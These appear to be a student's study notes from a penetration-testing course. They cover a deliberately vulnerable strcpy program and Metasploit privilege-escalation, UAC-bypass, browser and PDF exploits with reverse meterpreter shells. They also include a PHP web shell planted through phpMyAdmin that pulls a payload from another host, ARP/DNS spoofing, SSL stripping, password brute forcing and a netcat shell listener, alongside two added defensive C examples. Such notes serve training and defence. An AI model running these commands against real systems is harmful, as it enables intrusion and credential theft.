Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
x86 General Purpose Registers
EIP - instruction pointer
ESP - stack pointer
EBP - base pointer
ESI - source index
EDI - destination index
EAX - accumulator
EBX - base
ECX - counter
EDX - data

Sample of Vulnerable Code (C) overflowtest.c:

    #include <stdio.h>
    #include <string.h>

    void overflowed() {
        printf("%s\n", "Execution Hijacked");
    }

    /* copies user input into a 5-byte stack buffer with no length check */
    void function1(char *str) {
        char buffer[5];
        strcpy(buffer, str);
    }

    int main(int argc, char *argv[]) {
        if (argc < 2)
            return 1;
        function1(argv[1]);
        printf("%s\n", "Executed normally");
        return 0;
    }

Vulnerability:
(1) strcpy does not perform bounds checking.
(2) The program uses strcpy to copy user input into a fixed-size variable. Therefore, if it is given more data than the variable can hold, the copy continues into the adjacent memory addresses.
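The fix for the defect described above is a length check before the copy. The following is an added example, not code from the course or from the original notes: function1_safe keeps the same 5-byte buffer as overflowtest.c but rejects input that does not fit, and overflow_bytes shows how far a plain strcpy of a given input would write past the buffer. The function names and BUFFER_SIZE constant are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 5   /* same fixed size as buffer[5] in overflowtest.c */

/* Bounded replacement for the strcpy in function1(): copies src into dst and
 * returns 0 only when src plus its NUL terminator fits in dstsz bytes;
 * otherwise returns -1 and leaves dst untouched. Nothing is ever written
 * past dst[dstsz - 1]. memchr() is used instead of strlen() so that the scan
 * of src itself is bounded by dstsz. */
int bounded_copy(char *dst, size_t dstsz, const char *src) {
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    const char *end = memchr(src, '\0', dstsz);
    if (end == NULL)                      /* no terminator within dstsz: too long */
        return -1;
    size_t n = (size_t)(end - src);       /* n < dstsz, so n + 1 <= dstsz */
    memcpy(dst, src, n + 1);              /* n characters plus the NUL */
    return 0;
}

/* How many bytes strcpy(buffer, src) would write beyond a buffer of bufsz
 * bytes (0 if it fits). strcpy always writes strlen(src) + 1 bytes. */
size_t overflow_bytes(const char *src, size_t bufsz) {
    size_t needed = strlen(src) + 1;
    return needed > bufsz ? needed - bufsz : 0;
}

/* Hardened function1(): same 5-byte stack buffer, but the copy is bounded.
 * Returns 0 when the input was accepted, -1 when it was rejected. */
int function1_safe(const char *str) {
    char buffer[BUFFER_SIZE];
    if (bounded_copy(buffer, sizeof buffer, str) != 0)
        return -1;                        /* oversized input is refused, not copied */
    return 0;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    printf("strcpy would overrun buffer[%d] by %zu byte(s)\n",
           BUFFER_SIZE, overflow_bytes(argv[1], BUFFER_SIZE));
    if (function1_safe(argv[1]) == 0)
        printf("%s\n", "Input accepted");
    else
        printf("%s\n", "Input rejected: too long for buffer");
    return 0;
}
```

Run it with a four-character argument and the input is accepted; with anything longer the copy is refused and the program reports exactly how many bytes the original strcpy would have written past the end of the buffer. In real code the same effect is usually obtained with snprintf or strlcpy where available; the point is that the destination size, not the source length, must bound the copy.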
(1) Metasploit Scripts
    msf > use post/windows/gather/enum_logged_on_users
(2) Railgun
Extension for Meterpreter that allows access to the Windows API
    meterpreter > irb
    >> client.railgun.shell32.IsUserAnAdmin
(3) Local Privilege Escalation: GetSystem
    meterpreter > getsystem
(4) Local Privilege Escalation: Local Exploits
    msf > use exploit/windows/local/ms11_080_afdjoinleaf
    msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp
(5) Local Privilege Escalation: Bypassing UAC
    msf > use exploit/windows/local/bypassuac
(6) Local Privilege Escalation: Using a Public Exploit
Public exploits are in /usr/share/exploitdb
Trojans: Bypassing Anti-Virus Signature Detection
Techniques:
1- Binary Embedding
2- Metasploit Encoding
3- Multi-Encoding
4- Combining Techniques
5- Custom Compiling
6- Creating Shellcode
7- Hyperion
8- Veil
(1) Client Side Exploits: Browser Attacks
    msf > use exploit/windows/browser/ms10_002_aurora
    msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
    SRVHOST => 192.168.20.9
    msf exploit(ms10_002_aurora) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(ms10_002_aurora) > set URIPATH aurora
    URIPATH => aurora
    msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
    LHOST => 192.168.20.9
    msf exploit(ms10_002_aurora) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 192.168.20.9:4444
    [*] Using URL: http://192.168.20.9:80/aurora
(2) Automatically Migrating
    msf exploit(ms10_002_aurora) > set PrependMigrate true
(3) PDF Exploits
    msf > use exploit/windows/fileformat/adobe_utilprintf
    msf exploit(adobe_utilprintf) > show options
    msf exploit(adobe_utilprintf) > exploit
    [*] Creating 'msf.pdf' file...
    [+] msf.pdf stored at /root/.msf4/local/msf.pdf
    msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
    [*] exec: cp /root/.msf4/local/msf.pdf /var/www
    msf exploit(adobe_utilprintf) > service apache2 start
    [*] exec service apache2 start
    Starting web server: apache2.
    msf exploit(adobe_utilprintf) > use multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(handler) > exploit
    [*] Started reverse handler on 192.168.20.9:4444
Source: Georgia Weidman on "Advanced Penetration Test"
(1) Crunch
Tool to brute-force a keyspace
    $ crunch 7 7 AB
Brute-forces all 7-character passwords composed of only the characters A and B
(2) CeWL
Tool to map a website and pull potentially interesting words to add to a wordlist
    $ cewl -w [words].txt -d 1 -m 5 www.[website].com
-d 1: depth 1
-m 5: minimum word length is 5 characters
(3) Hydra
Online password-cracking tool
    $ hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3
Offline Password Attacks
Source: Georgia Weidman on "Advanced Penetration Test"
(1) WebDAV Default Credentials
Default -> wampp:xampp
a. cadaver http://192.168.0.190/webdav
b. Use msfvenom to create a PHP shell and upload it
c. Use msfconsole to exploit
(2) Open phpMyAdmin
a. Create a PHP shell on the Apache server using a SQL query:
    SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"
    http://192.168.0.190/shell.php?cmd=ipconfig
b. Add a meterpreter PHP file:
    http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php
Source: Georgia Weidman on "Advanced Penetration Test"
(1) ARP Spoofing
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
    arpspoof -i eth0 -t 192.168.20.10 192.168.20.11
(2) Domain Name Service (DNS): DNS Cache Poisoning
    hosts.txt:
    192.168.20.9 www.gmail.com
*Restart arpspoofing between gateway and target
    dnsspoof -i eth0 -f hosts.txt
(3) Secure Socket Layer (SSL)
Crypto between browser and webserver; credentials can't be seen in plaintext
SSL Man in the Middle: SSL Stripping
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Spoof the default gateway with arpspoof
    sslstrip -l 8080
Source: Georgia Weidman, "Advanced Penetration Test" Cybrary
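The two arpspoof commands above poison the target and the gateway in both directions, which leaves a visible trace on the victim: both of those IPs now resolve to the attacker's hardware address in the ARP cache. The following is an added example, not part of the course or of the original notes, that checks a dump of the cache for exactly that condition. The two ARP tables are constructed samples in the layout of Linux `arp -n` (the MAC addresses are invented), and all function names are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_ENTRIES 64
#define IP_LEN  16
#define MAC_LEN 18

struct arp_entry {
    char ip[IP_LEN];
    char mac[MAC_LEN];
};

/* Constructed sample (not real captured data) in the layout of Linux `arp -n`.
 * It models the attack above: the Kali host (192.168.20.9) has poisoned both the
 * target (.11) and the gateway (.10), so all three IPs resolve to one MAC. */
static const char SAMPLE_POISONED[] =
    "Address                  HWtype  HWaddress           Flags Mask            Iface\n"
    "192.168.20.1             ether   00:50:56:c0:00:08   C                     eth0\n"
    "192.168.20.9             ether   00:0c:29:de:ad:01   C                     eth0\n"
    "192.168.20.10            ether   00:0c:29:de:ad:01   C                     eth0\n"
    "192.168.20.11            ether   00:0c:29:de:ad:01   C                     eth0\n";

/* Constructed sample of the same hosts before the attack: one MAC per IP. */
static const char SAMPLE_CLEAN[] =
    "Address                  HWtype  HWaddress           Flags Mask            Iface\n"
    "192.168.20.1             ether   00:50:56:c0:00:08   C                     eth0\n"
    "192.168.20.9             ether   00:0c:29:de:ad:01   C                     eth0\n"
    "192.168.20.10            ether   00:0c:29:12:34:56   C                     eth0\n"
    "192.168.20.11            ether   00:0c:29:ab:cd:ef   C                     eth0\n";

/* Parse "<ip> <hwtype> <mac> ..." lines into entries. The header line and any
 * line without a leading IPv4 address and a colon-separated MAC are skipped.
 * MACs are lower-cased so "AA:BB" and "aa:bb" compare equal. Returns the count. */
int parse_arp_table(const char *text, struct arp_entry *out, int max) {
    int count = 0;
    const char *p = text;
    while (*p != '\0' && count < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';

        char ip[IP_LEN], hwtype[IP_LEN], mac[MAC_LEN];
        /* field widths are one less than the array sizes, so sscanf cannot overflow */
        if (sscanf(line, "%15s %15s %17s", ip, hwtype, mac) == 3 &&
            isdigit((unsigned char)ip[0]) && strchr(mac, ':') != NULL) {
            for (char *c = mac; *c; c++)
                *c = (char)tolower((unsigned char)*c);
            strcpy(out[count].ip, ip);    /* bounded: ip holds at most 15 chars */
            strcpy(out[count].mac, mac);  /* bounded: mac holds at most 17 chars */
            count++;
        }
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return count;
}

/* Count distinct MACs bound to two or more IPs and print one alert per MAC.
 * A bidirectional arpspoof leaves exactly this trace: target, gateway and the
 * attacker's own IP all resolve to the attacker's hardware address. */
int count_shared_macs(const struct arp_entry *e, int n) {
    int shared = 0;
    for (int i = 0; i < n; i++) {
        int seen_before = 0;
        for (int k = 0; k < i; k++)
            if (strcmp(e[k].mac, e[i].mac) == 0) { seen_before = 1; break; }
        if (seen_before)
            continue;                     /* counted when first encountered */
        int dups = 0;
        for (int j = i + 1; j < n; j++)
            if (strcmp(e[j].mac, e[i].mac) == 0) dups++;
        if (dups > 0) {
            printf("ALERT: %s is claimed by %d IPs\n", e[i].mac, dups + 1);
            shared++;
        }
    }
    return shared;
}

/* Parse a table dump and return the number of MACs flagged. */
int arp_spoof_indicators(const char *table_text) {
    struct arp_entry entries[MAX_ENTRIES];
    int n = parse_arp_table(table_text, entries, MAX_ENTRIES);
    return count_shared_macs(entries, n);
}

int main(void) {
    printf("clean table: %d shared MAC(s)\n", arp_spoof_indicators(SAMPLE_CLEAN));
    printf("poisoned table: %d shared MAC(s)\n", arp_spoof_indicators(SAMPLE_POISONED));
    return 0;
}
```

The clean table produces no alert; the poisoned one flags 00:0c:29:de:ad:01 as claimed by three IPs. A shared MAC is an indicator, not proof: a router with several addresses on one interface or a host with IP aliases shows the same pattern, so the check is best run against a baseline of the cache taken when the network was known good, and a change in the gateway's MAC from that baseline is the stronger signal.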
Query systems for potential vulnerabilities
(1) Nessus
Vulnerability database + scanner
(2) Nmap Scripting Engine
Vulnerability scripts, listed in /usr/share/nmap/scripts in Kali
    nmap -sC 172.16.85.135-136
    nmap --script-help=smb-check-vulns
    nmap --script=nfs-ls 172.16.85.136
    nmap --script=smb-os-discovery 172.16.85.136
(3) Metasploit Scanners
    auxiliary/scanner/ftp/anonymous
Web Application Scanning
(1) Dirbuster
Graphical tool used for brute-forcing directories and pages
(2) Nikto
Vulnerability database of known website issues
    nikto -host http://172.16.85.136
Manual Analysis
*Default passwords - WebDAV
*Misconfigured pages - open phpMyAdmin
*Port 3232 on the Windows system - sensitive webserver with directory traversal
# Source: Cybrary "Advanced Penetration Test"
*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?
(1) Google Dorks
Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/
Example: xamppdirpasswd.txt filetype:txt finds XAMPP passwords
(2) Shodan (Python API)
Search engine that uses banner grabbing
(3) Whois
Domain registration records
    root@kali:~# whois ________.com
(4) DNS Recon
    root@kali:~# host www.________.com
    root@kali:~# host -t ns ________.com
    root@kali:~# host -t mx ________.com
*DNS Zone Transfer
    root@kali:~# host -t ns zoneedit.com
    root@kali:~# host -l zoneedit.com ns2.zoneedit.com
*DNS Bruteforce
    root@kali:~# fierce -dns ________.com
(5) Netcraft
http://searchdns.netcraft.com/
(6) The Harvester
The Harvester automatically searches online for emails etc.
    root@kali:~# theharvester -d ________.com -l 500 -b all
# Notes on Cybrary "Advanced Penetration Test"
Opening a command shell listener:
    root@kali:~# nc -lvp 1234 -e /bin/bash
Transferring files:
Redirect output to a file:
    root@kali:~# nc -lvp 1234 > netcatfile
Send a file from another terminal:
    root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile
Automating Tasks with cron jobs
Add your task to one of the scheduled directories
*For more flexibility, add a line to /etc/crontab
Author: Vitali Kremez
July 2016